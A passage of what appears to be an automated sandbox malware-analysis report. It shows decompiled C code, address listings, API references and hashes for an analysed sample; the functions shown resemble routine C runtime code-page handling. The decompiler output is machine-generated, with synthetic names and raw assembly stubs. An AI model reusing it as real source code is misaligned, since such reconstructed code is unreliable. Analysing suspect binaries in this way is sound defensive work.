                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											L36:
                                                                                                                                                                                                                                                                            											E0037B448(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E0037F290(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                            					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                                            					__eflags = _t54;
                                                                                                                                                                                                                                                                            					_v36 = _t54;
                                                                                                                                                                                                                                                                            					_t55 = _t54 + 0x40d5c8;
                                                                                                                                                                                                                                                                            					_v32 = _t55;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						__eflags =  *_t55;
                                                                                                                                                                                                                                                                            						_t82 = _t55;
                                                                                                                                                                                                                                                                            						if( *_t55 != 0) {
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_t62 = _t82[1];
                                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                                            								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                                                                            									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                                            									if(_t92 > _t63) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                                            									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                                            										_t31 = _t94 + 0x40d5b4; // 0x8040201
                                                                                                                                                                                                                                                                            										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                                            										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                                            										__eflags = _t92;
                                                                                                                                                                                                                                                                            										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t82 =  &(_t82[2]);
                                                                                                                                                                                                                                                                            								__eflags =  *_t82;
                                                                                                                                                                                                                                                                            								if( *_t82 != 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t55 = _v32;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                            						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                                            						_v32 = _t55;
                                                                                                                                                                                                                                                                            						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                                            					} while (_t94 < 4);
                                                                                                                                                                                                                                                                            					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                            					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                                            					 *(_t98 + 0x21c) = E0037B332(_t78);
                                                                                                                                                                                                                                                                            					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                                            					_t91 = _v36 + 0x40d5bc;
                                                                                                                                                                                                                                                                            					_t95 = 6;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t58 =  *_t91;
                                                                                                                                                                                                                                                                            						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                                            						 *_t83 = _t58;
                                                                                                                                                                                                                                                                            						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                                            						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                                            						__eflags = _t95;
                                                                                                                                                                                                                                                                            					} while (_t95 != 0);
                                                                                                                                                                                                                                                                            					goto L36;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E0037B3E3(_t98);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L39:
                                                                                                                                                                                                                                                                            				return E0037DE3E(_v8 ^ _t99);
                                                                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                                                                            0x0037b7a5
                                                                                                                                                                                                                                                                            0x0037b7ac
                                                                                                                                                                                                                                                                            0x0037b7b4
                                                                                                                                                                                                                                                                            0x0037b7bc
                                                                                                                                                                                                                                                                            0x0037b7c1
                                                                                                                                                                                                                                                                            0x0037b7d2
                                                                                                                                                                                                                                                                            0x0037b7d2
                                                                                                                                                                                                                                                                            0x0037b7d4
                                                                                                                                                                                                                                                                            0x0037b7d6
                                                                                                                                                                                                                                                                            0x0037b7d8
                                                                                                                                                                                                                                                                            0x0037b7db
                                                                                                                                                                                                                                                                            0x0037b7db
                                                                                                                                                                                                                                                                            0x0037b7e1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b7e7
                                                                                                                                                                                                                                                                            0x0037b7e8
                                                                                                                                                                                                                                                                            0x0037b7eb
                                                                                                                                                                                                                                                                            0x0037b7ee
                                                                                                                                                                                                                                                                            0x0037b7f3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b7f5
                                                                                                                                                                                                                                                                            0x0037b7f5
                                                                                                                                                                                                                                                                            0x0037b7fb
                                                                                                                                                                                                                                                                            0x0037b8c9
                                                                                                                                                                                                                                                                            0x0037b801
                                                                                                                                                                                                                                                                            0x0037b801
                                                                                                                                                                                                                                                                            0x0037b807
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b80d
                                                                                                                                                                                                                                                                            0x0037b811
                                                                                                                                                                                                                                                                            0x0037b817
                                                                                                                                                                                                                                                                            0x0037b819
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b81f
                                                                                                                                                                                                                                                                            0x0037b824
                                                                                                                                                                                                                                                                            0x0037b82a
                                                                                                                                                                                                                                                                            0x0037b82c
                                                                                                                                                                                                                                                                            0x0037b8b6
                                                                                                                                                                                                                                                                            0x0037b8bc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b8be
                                                                                                                                                                                                                                                                            0x0037b8bf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b8bf
                                                                                                                                                                                                                                                                            0x0037b832
                                                                                                                                                                                                                                                                            0x0037b83c
                                                                                                                                                                                                                                                                            0x0037b841
                                                                                                                                                                                                                                                                            0x0037b849
                                                                                                                                                                                                                                                                            0x0037b84f
                                                                                                                                                                                                                                                                            0x0037b850
                                                                                                                                                                                                                                                                            0x0037b853
                                                                                                                                                                                                                                                                            0x0037b8a6
                                                                                                                                                                                                                                                                            0x0037b855
                                                                                                                                                                                                                                                                            0x0037b855
                                                                                                                                                                                                                                                                            0x0037b859
                                                                                                                                                                                                                                                                            0x0037b85c
                                                                                                                                                                                                                                                                            0x0037b85e
                                                                                                                                                                                                                                                                            0x0037b85e
                                                                                                                                                                                                                                                                            0x0037b861
                                                                                                                                                                                                                                                                            0x0037b863
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b865
                                                                                                                                                                                                                                                                            0x0037b868
                                                                                                                                                                                                                                                                            0x0037b873
                                                                                                                                                                                                                                                                            0x0037b873
                                                                                                                                                                                                                                                                            0x0037b875
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b86d
                                                                                                                                                                                                                                                                            0x0037b872
                                                                                                                                                                                                                                                                            0x0037b872
                                                                                                                                                                                                                                                                            0x0037b872
                                                                                                                                                                                                                                                                            0x0037b877
                                                                                                                                                                                                                                                                            0x0037b87a
                                                                                                                                                                                                                                                                            0x0037b87d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b87d
                                                                                                                                                                                                                                                                            0x0037b85e
                                                                                                                                                                                                                                                                            0x0037b87f
                                                                                                                                                                                                                                                                            0x0037b87f
                                                                                                                                                                                                                                                                            0x0037b882
                                                                                                                                                                                                                                                                            0x0037b887
                                                                                                                                                                                                                                                                            0x0037b887
                                                                                                                                                                                                                                                                            0x0037b88a
                                                                                                                                                                                                                                                                            0x0037b88b
                                                                                                                                                                                                                                                                            0x0037b88b
                                                                                                                                                                                                                                                                            0x0037b88b
                                                                                                                                                                                                                                                                            0x0037b89b
                                                                                                                                                                                                                                                                            0x0037b8a1
                                                                                                                                                                                                                                                                            0x0037b8a1
                                                                                                                                                                                                                                                                            0x0037b8ab
                                                                                                                                                                                                                                                                            0x0037b8ae
                                                                                                                                                                                                                                                                            0x0037b8af
                                                                                                                                                                                                                                                                            0x0037b8b0
                                                                                                                                                                                                                                                                            0x0037b974
                                                                                                                                                                                                                                                                            0x0037b975
                                                                                                                                                                                                                                                                            0x0037b97a
                                                                                                                                                                                                                                                                            0x0037b97b
                                                                                                                                                                                                                                                                            0x0037b97b
                                                                                                                                                                                                                                                                            0x0037b82c
                                                                                                                                                                                                                                                                            0x0037b819
                                                                                                                                                                                                                                                                            0x0037b807
                                                                                                                                                                                                                                                                            0x0037b7fb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b97d
                                                                                                                                                                                                                                                                            0x0037b8db
                                                                                                                                                                                                                                                                            0x0037b8e3
                                                                                                                                                                                                                                                                            0x0037b8e3
                                                                                                                                                                                                                                                                            0x0037b8e7
                                                                                                                                                                                                                                                                            0x0037b8ea
                                                                                                                                                                                                                                                                            0x0037b8f0
                                                                                                                                                                                                                                                                            0x0037b8f3
                                                                                                                                                                                                                                                                            0x0037b8f3
                                                                                                                                                                                                                                                                            0x0037b8f6
                                                                                                                                                                                                                                                                            0x0037b8f8
                                                                                                                                                                                                                                                                            0x0037b8fa
                                                                                                                                                                                                                                                                            0x0037b8fa
                                                                                                                                                                                                                                                                            0x0037b8fd
                                                                                                                                                                                                                                                                            0x0037b8ff
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b901
                                                                                                                                                                                                                                                                            0x0037b904
                                                                                                                                                                                                                                                                            0x0037b920
                                                                                                                                                                                                                                                                            0x0037b920
                                                                                                                                                                                                                                                                            0x0037b922
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b909
                                                                                                                                                                                                                                                                            0x0037b90f
                                                                                                                                                                                                                                                                            0x0037b911
                                                                                                                                                                                                                                                                            0x0037b917
                                                                                                                                                                                                                                                                            0x0037b91b
                                                                                                                                                                                                                                                                            0x0037b91b
                                                                                                                                                                                                                                                                            0x0037b91c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b91c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b90f
                                                                                                                                                                                                                                                                            0x0037b924
                                                                                                                                                                                                                                                                            0x0037b927
                                                                                                                                                                                                                                                                            0x0037b92a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b92a
                                                                                                                                                                                                                                                                            0x0037b92c
                                                                                                                                                                                                                                                                            0x0037b92c
                                                                                                                                                                                                                                                                            0x0037b92f
                                                                                                                                                                                                                                                                            0x0037b930
                                                                                                                                                                                                                                                                            0x0037b933
                                                                                                                                                                                                                                                                            0x0037b936
                                                                                                                                                                                                                                                                            0x0037b936
                                                                                                                                                                                                                                                                            0x0037b93c
                                                                                                                                                                                                                                                                            0x0037b93f
                                                                                                                                                                                                                                                                            0x0037b94e
                                                                                                                                                                                                                                                                            0x0037b957
                                                                                                                                                                                                                                                                            0x0037b95c
                                                                                                                                                                                                                                                                            0x0037b962
                                                                                                                                                                                                                                                                            0x0037b963
                                                                                                                                                                                                                                                                            0x0037b963
                                                                                                                                                                                                                                                                            0x0037b966
                                                                                                                                                                                                                                                                            0x0037b969
                                                                                                                                                                                                                                                                            0x0037b96c
                                                                                                                                                                                                                                                                            0x0037b96f
                                                                                                                                                                                                                                                                            0x0037b96f
                                                                                                                                                                                                                                                                            0x0037b96f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b7c3
                                                                                                                                                                                                                                                                            0x0037b7c4
                                                                                                                                                                                                                                                                            0x0037b7ca
                                                                                                                                                                                                                                                                            0x0037b97e
                                                                                                                                                                                                                                                                            0x0037b98d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0037B370: GetOEMCP.KERNEL32(00000000), ref: 0037B39B
                                                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0037B63E,?,00000000), ref: 0037B811
                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,0037B63E,?,?,?,0037B63E,?,00000000), ref: 0037B824
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 546120528-0
                                                                                                                                                                                                                                                                            • Opcode ID: b3cf53aa5e46daf0bfc3427ac46d9b0f41c1634fa1490359e45ba7aa10a0cfe1
                                                                                                                                                                                                                                                                            • Instruction ID: be489b4b79e10e8db301ac77b5ae243efe024ec7a0b5dda0fb94c5798b768a58
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3cf53aa5e46daf0bfc3427ac46d9b0f41c1634fa1490359e45ba7aa10a0cfe1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95511374D00285AFEB368F75C8807BAFBF9AF41310F14C0AED59A9B251D73C99458B92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 217 37b5dc-37b606 call 379e50 call 37b6fb call 37b370 224 37b60c-37b621 call 37bf3c 217->224 225 37b608-37b60a 217->225 229 37b623-37b639 call 37b79d 224->229 230 37b651 224->230 226 37b65f-37b662 225->226 233 37b63e-37b644 229->233 232 37b653-37b65e call 37a8fb 230->232 232->226 235 37b646-37b64b call 379a46 233->235 236 37b663-37b667 233->236 235->230 239 37b66e-37b679 236->239 240 37b669 call 37a004 236->240 242 37b690-37b6aa 239->242 243 37b67b-37b685 239->243 240->239 242->232 246 37b6ac-37b6b3 242->246 243->242 245 37b687-37b68f call 37a8fb 243->245 245->242 246->232 248 37b6b5-37b6cc call 37b246 246->248 248->232 252 37b6ce-37b6d8 248->252 252->232
                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E0037B5DC(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                                                            				char _t31;
                                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                                            				char _t40;
                                                                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                                                                            				char _t45;
                                                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t81 = __eflags;
                                                                                                                                                                                                                                                                            				_v8 = E00379E50(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                            				E0037B6FB(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                            				_t31 = E0037B370(_t81, _a4);
                                                                                                                                                                                                                                                                            				_v16 = _t31;
                                                                                                                                                                                                                                                                            				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                                            				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                                                            				_t70 = E0037BF3C(_t57, 0x220);
                                                                                                                                                                                                                                                                            				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                                            				__eflags = _t70;
                                                                                                                                                                                                                                                                            				if(__eflags == 0) {
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					_t75 = _t51;
                                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                                            					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                                            					_t36 = E0037B79D(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                                            					_t75 = _t36;
                                                                                                                                                                                                                                                                            					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                                            					if(_t75 != _t51) {
                                                                                                                                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                                                                                                                                            							E0037A004();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                                            						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                                            						if(_t51 == 1) {
                                                                                                                                                                                                                                                                            							_t45 = _v8;
                                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x40d8b0;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t45 + 0x48)) != 0x40d8b0) {
                                                                                                                                                                                                                                                                            								E0037A8FB( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *_t70 = 1;
                                                                                                                                                                                                                                                                            						_t64 = _t70;
                                                                                                                                                                                                                                                                            						_t70 = 0;
                                                                                                                                                                                                                                                                            						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                                            						_t40 = _v8;
                                                                                                                                                                                                                                                                            						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                                            						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            							__eflags =  *0x40dad4 & 0x00000001;
                                                                                                                                                                                                                                                                            							if(( *0x40dad4 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            								_v16 =  &_v8;
                                                                                                                                                                                                                                                                            								E0037B246(5,  &_v16);
                                                                                                                                                                                                                                                                            								__eflags = _a8;
                                                                                                                                                                                                                                                                            								if(_a8 != 0) {
                                                                                                                                                                                                                                                                            									_t44 =  *0x40dad0; // 0x14e39f8
                                                                                                                                                                                                                                                                            									 *0x40d59c = _t44;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                                            						E0037A8FB(_t70);
                                                                                                                                                                                                                                                                            						return _t75;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(E00379A46())) = 0x16;
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x0037b5dc
                                                                                                                                                                                                                                                                            0x0037b5e9
                                                                                                                                                                                                                                                                            0x0037b5ec
                                                                                                                                                                                                                                                                            0x0037b5f4
                                                                                                                                                                                                                                                                            0x0037b5fd
                                                                                                                                                                                                                                                                            0x0037b600
                                                                                                                                                                                                                                                                            0x0037b606
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b608
                                                                                                                                                                                                                                                                            0x0037b60c
                                                                                                                                                                                                                                                                            0x0037b619
                                                                                                                                                                                                                                                                            0x0037b61b
                                                                                                                                                                                                                                                                            0x0037b61f
                                                                                                                                                                                                                                                                            0x0037b621
                                                                                                                                                                                                                                                                            0x0037b651
                                                                                                                                                                                                                                                                            0x0037b651
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b623
                                                                                                                                                                                                                                                                            0x0037b630
                                                                                                                                                                                                                                                                            0x0037b636
                                                                                                                                                                                                                                                                            0x0037b639
                                                                                                                                                                                                                                                                            0x0037b63e
                                                                                                                                                                                                                                                                            0x0037b642
                                                                                                                                                                                                                                                                            0x0037b644
                                                                                                                                                                                                                                                                            0x0037b663
                                                                                                                                                                                                                                                                            0x0037b667
                                                                                                                                                                                                                                                                            0x0037b669
                                                                                                                                                                                                                                                                            0x0037b669
                                                                                                                                                                                                                                                                            0x0037b674
                                                                                                                                                                                                                                                                            0x0037b678
                                                                                                                                                                                                                                                                            0x0037b679
                                                                                                                                                                                                                                                                            0x0037b67b
                                                                                                                                                                                                                                                                            0x0037b67e
                                                                                                                                                                                                                                                                            0x0037b685
                                                                                                                                                                                                                                                                            0x0037b68a
                                                                                                                                                                                                                                                                            0x0037b68f
                                                                                                                                                                                                                                                                            0x0037b685
                                                                                                                                                                                                                                                                            0x0037b690
                                                                                                                                                                                                                                                                            0x0037b696
                                                                                                                                                                                                                                                                            0x0037b69b
                                                                                                                                                                                                                                                                            0x0037b69d
                                                                                                                                                                                                                                                                            0x0037b6a0
                                                                                                                                                                                                                                                                            0x0037b6a3
                                                                                                                                                                                                                                                                            0x0037b6aa
                                                                                                                                                                                                                                                                            0x0037b6ac
                                                                                                                                                                                                                                                                            0x0037b6b3
                                                                                                                                                                                                                                                                            0x0037b6b8
                                                                                                                                                                                                                                                                            0x0037b6c1
                                                                                                                                                                                                                                                                            0x0037b6c6
                                                                                                                                                                                                                                                                            0x0037b6cc
                                                                                                                                                                                                                                                                            0x0037b6ce
                                                                                                                                                                                                                                                                            0x0037b6d3
                                                                                                                                                                                                                                                                            0x0037b6d3
                                                                                                                                                                                                                                                                            0x0037b6cc
                                                                                                                                                                                                                                                                            0x0037b6b3
                                                                                                                                                                                                                                                                            0x0037b653
                                                                                                                                                                                                                                                                            0x0037b654
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b646
                                                                                                                                                                                                                                                                            0x0037b64b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b64b
                                                                                                                                                                                                                                                                            0x0037b644

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00379E50: GetLastError.KERNEL32(?,?,003760D1,?,?,?,00374DA8,?), ref: 00379E54
                                                                                                                                                                                                                                                                              • Part of subcall function 00379E50: _free.LIBCMT ref: 00379E87
                                                                                                                                                                                                                                                                              • Part of subcall function 00379E50: SetLastError.KERNEL32(00000000,?), ref: 00379EC8
                                                                                                                                                                                                                                                                              • Part of subcall function 00379E50: _abort.LIBCMT ref: 00379ECE
                                                                                                                                                                                                                                                                              • Part of subcall function 0037B6FB: _abort.LIBCMT ref: 0037B72D
                                                                                                                                                                                                                                                                              • Part of subcall function 0037B6FB: _free.LIBCMT ref: 0037B761
                                                                                                                                                                                                                                                                              • Part of subcall function 0037B370: GetOEMCP.KERNEL32(00000000), ref: 0037B39B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037B654
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037B68A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2991157371-0
                                                                                                                                                                                                                                                                            • Opcode ID: 36ad491755d0b823f70f73999b20429a01ffe55f74e1e9c26b455f3918caec99
                                                                                                                                                                                                                                                                            • Instruction ID: e2eda3b5ddb7ba137ee114a91a5f0a103bff2087aa4c8bba3366b119dda20ab2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36ad491755d0b823f70f73999b20429a01ffe55f74e1e9c26b455f3918caec99
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31A431904208AFDB22EFA9D445B5DF7F5DF40320F25C099E51C9B2A1DB7A5D41CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 277 381f89-381f96 call 37a89e 279 381f9b-381fa6 277->279 280 381fa8-381faa 279->280 281 381fac-381fb4 279->281 282 381ff4-382002 call 37a8fb 280->282 281->282 283 381fb6-381fba 281->283 284 381fbc-381fee call 37aba7 283->284 289 381ff0-381ff3 284->289 289->282
                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E00381F89(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                                                                            				char _t16;
                                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                            				char _t31;
                                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(_t26);
                                                                                                                                                                                                                                                                            				_push(_t26);
                                                                                                                                                                                                                                                                            				_t16 = E0037A89E(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                                            				_t31 = _t16;
                                                                                                                                                                                                                                                                            				_v12 = _t31;
                                                                                                                                                                                                                                                                            				_t28 = _t30;
                                                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                                                            					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                                            					_t17 = _t2;
                                                                                                                                                                                                                                                                            					__eflags = _t31 - _t17;
